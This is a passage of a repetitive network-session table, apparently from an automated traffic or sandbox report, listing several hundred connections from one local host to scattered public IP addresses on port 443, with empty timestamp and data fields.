                                    18112192.168.2.1351320141.152.69.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18113192.168.2.1356850175.220.42.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18114192.168.2.133297495.246.240.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18115192.168.2.1359016129.129.249.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18116192.168.2.1359992206.22.105.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18117192.168.2.1359164104.1.36.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18118192.168.2.134290864.159.53.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18119192.168.2.135893884.200.58.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18120192.168.2.1352416104.42.100.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18121192.168.2.1358436102.91.178.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18122192.168.2.1348926199.179.244.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18123192.168.2.1342362135.195.13.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18124192.168.2.1340976186.56.204.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18125192.168.2.1341958152.122.130.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18126192.168.2.134524673.69.96.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18127192.168.2.134641843.214.6.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18128192.168.2.1337836165.90.67.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18129192.168.2.1342724154.63.10.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18130192.168.2.1354272158.22.130.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18131192.168.2.1338136152.78.65.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18132192.168.2.1347198222.38.120.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18133192.168.2.1343180189.242.27.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18134192.168.2.1337554116.176.86.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18135192.168.2.1339762159.119.235.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18136192.168.2.1354238121.154.70.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18137192.168.2.1359110135.104.97.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18138192.168.2.135908493.95.244.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18139192.168.2.134336651.176.45.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18140192.168.2.134931431.165.134.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18141192.168.2.1344968146.64.194.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18142192.168.2.1355644211.161.3.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18143192.168.2.135702487.5.153.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18144192.168.2.136039623.56.152.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18145192.168.2.1340184147.196.14.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18146192.168.2.135257280.68.195.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18147192.168.2.135144060.160.53.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18148192.168.2.1346988108.43.11.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18149192.168.2.136055292.92.124.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18150192.168.2.1355972179.91.45.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18151192.168.2.134631661.134.135.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18152192.168.2.135936887.156.42.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18153192.168.2.135652836.223.33.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18154192.168.2.1335414115.207.180.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18155192.168.2.1353408181.98.183.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18156192.168.2.1356168191.193.186.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18157192.168.2.1345588135.89.149.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18158192.168.2.1350712148.55.221.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18159192.168.2.1348398141.165.240.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18160192.168.2.1345566192.29.105.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18161192.168.2.134873643.82.217.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18162192.168.2.135074627.58.3.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18163192.168.2.1340858160.180.44.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18164192.168.2.1342202132.247.83.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18165192.168.2.1349404181.222.243.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18166192.168.2.134072042.93.39.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18167192.168.2.1358074205.162.32.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18168192.168.2.135806070.190.80.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18169192.168.2.134070627.216.113.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18170192.168.2.1334672188.223.9.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18171192.168.2.1353258132.238.54.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18172192.168.2.1350410139.73.72.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18173192.168.2.135453045.6.178.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18174192.168.2.1352330162.41.52.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18175192.168.2.1358976208.221.64.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18176192.168.2.1358448187.90.230.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18177192.168.2.1335916100.230.183.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18178192.168.2.134844897.252.189.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18179192.168.2.134226818.250.137.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18180192.168.2.1339962167.241.34.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18181192.168.2.1347296134.79.144.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18182192.168.2.1357540155.136.218.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18183192.168.2.134395896.74.34.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18184192.168.2.134630869.243.1.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18185192.168.2.1335826101.241.146.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18186192.168.2.135154662.1.154.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18187192.168.2.134051090.56.207.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18188192.168.2.134947069.36.226.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18189192.168.2.1343280173.143.63.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18190192.168.2.136014420.239.1.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18191192.168.2.135540841.254.148.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18192192.168.2.133790861.190.215.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18193192.168.2.134557086.168.248.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18194192.168.2.1340004176.223.254.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18195192.168.2.1338338168.96.179.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18196192.168.2.135809461.195.203.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18197192.168.2.1340340135.247.242.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18198192.168.2.1341916141.99.160.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18199192.168.2.1346184121.28.1.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18200192.168.2.134336081.181.150.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18201192.168.2.135106064.38.71.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18202192.168.2.1348302166.219.76.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18203192.168.2.1340706104.25.33.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18204192.168.2.1339082154.74.18.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18205192.168.2.1355194104.171.189.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18206192.168.2.135101683.204.8.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18207192.168.2.135567419.227.148.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18208192.168.2.1358820117.226.111.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18209192.168.2.1332940151.119.224.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18210192.168.2.1334456209.193.72.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18211192.168.2.1334666141.26.92.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18212192.168.2.1349082187.70.57.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18213192.168.2.1336638160.78.172.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18214192.168.2.1346068180.81.102.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18215192.168.2.1338802132.206.80.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18216192.168.2.1352454200.30.252.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18217192.168.2.1347444192.227.155.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18218192.168.2.1350694163.254.32.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18219192.168.2.1347602186.42.90.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18220192.168.2.1357360119.215.226.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18221192.168.2.134669285.146.150.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18222192.168.2.1346788217.77.29.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18223192.168.2.1356898185.93.83.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18224192.168.2.1344510207.124.171.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18225192.168.2.1357404145.114.215.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18226192.168.2.135415237.152.88.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18227192.168.2.1352480101.59.35.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18228192.168.2.1343588218.252.248.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18229192.168.2.1347906204.120.76.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18230192.168.2.135322690.218.67.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18231192.168.2.1334726114.181.168.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18232192.168.2.1351014111.45.70.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18233192.168.2.135680869.94.158.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18234192.168.2.133432613.22.29.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18235192.168.2.13403589.230.172.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18236192.168.2.13339548.182.192.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18237192.168.2.1354000118.188.86.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18238192.168.2.135857489.157.53.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18239192.168.2.135671095.226.46.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18240192.168.2.134009072.185.227.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18241192.168.2.135077266.123.160.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18242192.168.2.1335942176.85.125.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18243192.168.2.135916842.164.243.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18244192.168.2.135613044.177.170.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18245192.168.2.1349970150.20.209.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18246192.168.2.1339932144.222.221.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18247192.168.2.1344666106.11.18.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18248192.168.2.1344374202.232.2.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18249192.168.2.1333878206.6.255.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18250192.168.2.133328617.224.154.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18251192.168.2.135561890.146.185.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18252192.168.2.1353010178.57.178.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18253192.168.2.133854862.83.90.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18254192.168.2.1334882113.38.42.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18255192.168.2.136005491.251.52.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18256192.168.2.1334874218.54.67.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18257192.168.2.1342524103.230.194.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18258192.168.2.134289643.122.182.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18259192.168.2.133877462.84.53.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18260192.168.2.1348054124.249.94.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18261192.168.2.1347126208.157.188.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18262192.168.2.1334810124.178.17.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18263192.168.2.135491454.63.84.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18264192.168.2.135572067.78.196.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18265192.168.2.1357192166.140.215.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18266192.168.2.1355158181.201.183.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18267192.168.2.1355814163.99.131.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18268192.168.2.1349450126.147.197.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18269192.168.2.135157013.154.51.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18270192.168.2.1353238149.66.147.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18271192.168.2.1359200113.149.142.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18272192.168.2.1340462133.178.101.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18273192.168.2.135428476.217.150.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18274192.168.2.1333190125.120.193.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18275192.168.2.133734889.50.205.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18276192.168.2.135207864.26.200.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18277192.168.2.133301881.86.39.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18278192.168.2.134737279.25.47.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18279192.168.2.135591062.54.53.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18280192.168.2.134149870.126.199.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18281192.168.2.1349010203.168.92.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18282192.168.2.135227223.193.29.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18283192.168.2.135194025.177.14.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18284192.168.2.1350508183.83.23.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18285192.168.2.1351200132.194.5.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18286192.168.2.134096896.65.191.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18287192.168.2.134194270.134.10.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18288192.168.2.134911880.206.38.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18289192.168.2.1349340171.62.51.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18290192.168.2.134801295.59.215.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18291192.168.2.134288274.249.218.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18292192.168.2.1354172140.65.148.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18293192.168.2.135987084.73.170.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18294192.168.2.134836247.44.152.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18295192.168.2.134962291.90.19.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18296192.168.2.134907879.222.233.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18297192.168.2.1339764111.228.186.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18298192.168.2.134640046.213.218.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18299192.168.2.1333158207.73.79.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18300192.168.2.1338600223.207.210.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18301192.168.2.1333734217.175.35.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18302192.168.2.1360826179.144.114.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18303192.168.2.134664479.139.169.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18304192.168.2.134471487.240.164.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18305192.168.2.1357228141.12.76.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18306192.168.2.135374467.253.192.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18307192.168.2.1358932107.251.236.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18308192.168.2.133884260.250.44.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18309192.168.2.134240893.138.206.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18310192.168.2.135685452.13.46.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18311192.168.2.1345432184.90.165.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18312192.168.2.135791227.141.87.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18313192.168.2.1341854168.143.118.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18314192.168.2.1339804220.121.85.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18315192.168.2.1354898121.58.43.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18316192.168.2.133342266.20.216.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18317192.168.2.135714266.209.16.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18318192.168.2.1355646109.166.55.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18319192.168.2.135168665.242.28.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18320192.168.2.1344932169.240.107.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18321192.168.2.1336370143.118.53.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18322192.168.2.1358254190.202.71.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18323192.168.2.134208244.243.244.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18324192.168.2.1357086110.172.4.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18325192.168.2.1342882116.180.237.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18326192.168.2.1339438143.240.100.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18327192.168.2.134245488.217.249.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18328192.168.2.1351362188.207.25.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18329192.168.2.1350020196.3.90.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18330192.168.2.134269290.107.53.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18331192.168.2.1353590201.37.167.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18332192.168.2.1341014193.35.24.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18333192.168.2.1334374167.30.9.229443
                                    TimestampBytes transferredDirectionData


